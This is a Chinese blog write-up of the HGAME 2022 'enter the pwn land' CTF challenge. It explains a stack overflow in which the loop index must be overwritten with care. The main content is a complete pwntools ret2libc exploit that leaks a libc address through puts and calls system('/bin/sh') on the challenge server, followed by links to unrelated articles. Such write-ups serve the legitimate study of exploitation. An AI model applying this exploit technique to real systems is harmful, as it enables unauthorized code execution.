【pwn】[HGAME 2022 week1]enter the pwn land --数组下标修改，栈溢出

最新推荐文章于 2026-01-08 23:14:00 发布

原创最新推荐文章于 2026-01-08 23:14:00 发布 · 122 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#python #c语言 #网络安全 #安全

本文描述了一次利用栈溢出漏洞进行的攻击过程，通过构造payload修改变量值，实现从puts地址计算出libc基址，进而执行system调用，达到控制程序流程的目的。

查保护

然后ida看代码逻辑

来到关键函数，这里存在栈溢出漏洞，但是这是数组循环一个字节读入，我们看一下i的地址

发现i的地址在rbp上面，所以我们构造payload肯定会把i的值给覆盖了，所以payload在构造时需要修改一下i的值，让我们的payload继续读入到正确位置，然后就是简单的ret2libc

exp：

from pwn import *

from LibcSearcher import *

context(os='linux',arch='amd64',log_level='debug')

io=remote("node5.anna.nssctf.cn",28093)

elf=ELF("./pwn")

puts_got=elf.got['puts']

puts_plt=elf.plt['puts']

rdi=0x401313

ret=0x40101a

main_addr=elf.sym['main']

payload=b'a'*44+p32(44)+b'a'*8+p64(rdi)+p64(puts_got)+p64(puts_plt)+p64(main_addr)

io.sendline(payload)

puts_addr=u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))

print(hex(puts_addr))

libc=LibcSearcher('puts',puts_addr)

base=puts_addr-libc.dump('puts')

system_addr=base+libc.dump('system')

str=base+libc.dump('str_bin_sh')

payload2=b'a'*44+p32(44)+b'a'*8+p64(ret)+p64(rdi)+p64(str)+p64(system_addr)

io.sendline(payload2)

io.interactive()

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

GGb0mb

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

2022 hgame pwn wp

weixin_45209963的博客

03-27

5135

2022 hgame pwn wp 本来早就写好了，但是由于复试毕设等等原因拖到今天才发包括了绝大部分题目，除了算法题spfa和bpwn，剩下一些简单题懒得写了orz 文章目录2022 hgame pwn wpWeek 1enter_the_pwn_landenter_the_evil_pwn_landoldfashion_orwWeek 2oldfashion_noteechoWeek 3changeable_noteelder_notesized_noteWeek 4vector Week 1 ent

hgame 2022 PWN 部分题目 Writeup

02-18

3508

hgame 2022 pwn 部分题目writeup

参与评论您还未登录，请先登录后发表或查看评论

PWN-COMPETITION-HGAME2022-Week1

P1umH0的博客

01-28

1492

PWN-COMPETITION-HGAME2022Week1enter_the_pwn_landenter_the_evil_pwn_landoldfashion_orw(unsolved)ser_per_fa(unsol)test_your_nctest_your_gdb Week1 enter_the_pwn_land 栈溢出，需要注意的是下标 i 的地址比输入s的地址更高 s溢出会覆盖 i ，于是需要小心地覆写 i 的值，让循环顺利执行下去然后就是常规的ret2libc # -*- coding:

使用Python进行人工智能（AI）网页抓取：综合指南

SmartGarret的博客

01-07

467

使用Python进行人工智能（AI）网页抓取通过让模型解释页面内容而不是依赖脆弱的HTML规则来简化提取。Python仍然处理获取、验证和存储，而人工智能（AI）即使在布局更改时也能提供一致的结构化数据。随着工作流程的增长，用于抓取的MCP服务器和n8n自动化等工具使扩展、处理重试和将结果移至下游变得更容易，而无需为脚本添加复杂性。这种方法同样适用于快速实验和生产就绪的管道。人工智能（AI）网页抓取是使用语言模型而不是刚性解析规则从网页提取结构化数据的一种方法。

秋叶SD-Trainer中缺少包的问题解决方式，例如onnxruntime

hello000w的博客

01-07

292

解决sd-trainer安装包的问题

面向微服务事件驱动与异步消息可靠处理的互联网系统高可用设计与多语言工程实践分享

2501_94180531的博客

01-05

463

事件驱动解耦服务，提高吞吐可靠投递与幂等消费保证消息一致性监控、重试与顺序控制是稳定性的关键微服务事件驱动与异步消息可靠处理，使系统在高并发和复杂业务场景下保持稳定与可控。通过在多语言系统中统一幂等语义、结合可靠投递、顺序控制和监控策略，互联网系统能够在异步流程中实现高可用和长期可维护性。这篇关于事件驱动与异步消息可靠处理的工程实践分享，希望为你在微服务高可用设计中提供可落地、长期有效的参考思路。

学习笔记097——Ubuntu系统中如何通过service服务的方式启动 jar 包？

code__bee的博客

01-06

222

【代码】学习笔记097——Ubuntu系统中如何通过service服务的方式启动 jar 包？

TDengine JAVA 语言连接器入门指南

TDengine(老段）专注时序数据库领域

01-04

1823

JAVA 语言连接器

使用 Pycharm 实现 Robot Framework 的自动化

Sally_xy的博客

01-07

787

PyCharm 是一款由 JetBrains 开发的 Python IDE由于 PyCharm 是一个 Python 集成开发环境（IDE），因此它可以用于开发我们用来为 Robot Framework 增加功能的 Python 脚本，并附带代码补全和集成文档等功能PyCharm 较 RIDE 性能更优，并且集成了 Git、Mercurial 等版本控制系统，使得团队协作和代码管理更加高效。

快速搭建Web前端（streamlit使用指南）

weixin_47014685的博客

01-04

1082

Streamlit是一个用于快速构建Web应用的Python框架，通过几行代码即可实现美观的Web界面。本文详细介绍并演示了文本显示、数据表格、图表可视化、交互组件（按钮、滑块、表单等）、会话状态管理、缓存机制和多种布局选项（侧边栏、分栏）。特别适合快速部署模型和数据分析仪表板，无需前端开发经验。

myhdl

qq_26074053的博客

01-05

358

【代码】myhdl。

Java Map集合遍历方式完全指南：五种方法详解与性能对比

yc2284238579的博客

01-05

948

本文详细解析了Java中Map集合的五种遍历方式：keySet()、entrySet()、values()、迭代器和Lambda表达式。通过原理分析、代码示例和性能对比，文章指出entrySet()是综合性能最优的遍历方式，可直接操作键值对避免二次查找；values()适用于仅需处理值的场景；迭代器适合需要安全删除元素的场景；而Java8+的Lambda表达式则提供了更简洁的语法。文章还给出了选择指南和最佳实践，建议根据具体场景选择遍历方式，并提供了缓存系统、配置管理等实际应用案例，帮助开发者编写高效、易维

从API网关到统一流量治理的互联网工程语法实践与多语言探索

2501_94180176的博客

01-06

370

API网关不仅是请求入口，更是互联网工程中将路由规则、安全策略和访问边界显式化为工程语法的实践。当系统能够表达：请求访问边界和路由规则权限策略与安全控制节点健康与负载情况它就能在高并发、分布式环境下保持可控、可观测和安全。成熟的互联网工程，不是单纯转发请求，而是系统行为可理解、访问可控、安全边界清晰。

PyCharm从父目录的其他文件夹中导入模块报红但是主程序可以运行

m0_74117571的博客

01-05

253

直接将run_experiment.py文件移动到父目录就可以解决报红问题并且un_experiment.py可以单独运行成功。（但是这样会影响我的项目结构，有大佬能够提供更好的解决方法吗？run_experiment.py文件报红且不能运行但是main.py可以运行，并且run_experiment.py生效。2.如果是运行main.py运行成功并且run_experiment.py也生效。下面的是我的项目结构。

Python爬虫防检测实战：基于类封装的工程化解决方案（2026）

wbryze的博客

01-05

585

在Python爬虫开发中，反检测是保证爬虫长期稳定运行的关键。本文将详细介绍如何通过面向对象编程和类封装技术，构建一个具备强抗封禁能力的爬虫系统，并提供可落地的代码方案。一、爬虫检测机制与类封装优势现代网站通过多种机制识别爬虫，包括请求头分析、行为模式检测、指纹识别和IP频率监控等。下面是基础爬虫类的设计框架：“”“爬虫基类（2026年实测有效）”“”二、核心防检测技术实现固定不变的请求头是最易被识别的特征。以下是动态轮换机制的实现：“”“动态请求头管理类”“”

【开题答辩全过程】以基于Hadoop的新闻推荐系统为例，包含答辩的问题和答案

shiji9932的博客

01-07

305

本文介绍了一位拥有14年经验的毕设指导专家，擅长Java、PHP、Python等多种开发语言，提供项目定制、代码讲解、答辩辅导等服务。以"基于Hadoop的新闻推荐系统"为例，详细展示了答辩过程：系统采用Python爬虫+Hadoop+Hive+Vue+Flask技术栈，使用协同过滤算法实现推荐功能。针对评委关于技术选型、冷启动、开发进度等问题的回答体现了务实态度，最终开题获得通过。文末提供往届真实开题报告参考，建议学生独立完成毕设，也可联系获取选题建议和资料支持。

网站证书自动续订失败的问题解决,原来是续订指令certbot renew出错，导致crontab定时任务续订失败

skywalk8163的专栏

01-04

1031

摘要：本文记录了解决Let's Encrypt证书自动续订失败的过程。问题表现为证书即将过期但自动续订失效，报错涉及nginx插件缺失和账户不存在。通过排查发现：1）需安装python3-certbot-nginx插件；2）证书版本过低（2.9.0）导致与ACMEv2协议不兼容；3）存在无效域名解析记录影响验证。最终解决方案包括：升级certbot到5.2.2版本、删除问题域名DNS记录、重新注册证书并清理旧配置文件。尽管成功解决了问题，但作者仍对旧账户报错原因和初始续订失败的原因存在疑惑。

【期货量化实战】威廉指标(WR)策略：精准捕捉超买超卖信号（Python源码）

m0_73841933的博客

01-07

450

在众多震荡指标中，**威廉指标（Williams %R）**以其敏感度高、信号明确而著称。它能比RSI更快地捕捉到市场的超买超卖状态，是短线交易者的利器。计算技术指标需要可靠的K线数据源。：本文仅供学习交流使用，不构成任何投资建议。期货交易有风险，入市需谨慎。：建议先使用模拟盘充分测试策略，确认无误后再考虑实盘交易。

Python基础（4）| 详解程序选择结构：单分支、双分支与多分支逻辑（附代码）